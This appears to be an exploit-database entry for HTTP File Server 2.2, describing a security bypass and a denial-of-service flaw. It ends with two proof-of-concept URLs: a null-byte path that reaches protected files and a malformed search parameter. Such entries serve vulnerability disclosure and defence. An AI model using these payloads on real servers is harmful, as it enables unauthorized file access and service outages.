[] NeoSense

HTTP File Server 2.2 - Security Bypass / Denial of Service

Author: Luigi Auriemma
type: remote
platform: windows
port: 
date_added: 2010-04-19 
date_updated: 2014-06-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/39544/info

HTTP File Server is prone to multiple vulnerabilities including a security-bypass issue and a denial-of-service issue.

Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions.

http://www.example.com/protected_folder/secret_file.txt%00
http://www.example.com/?search=%25%25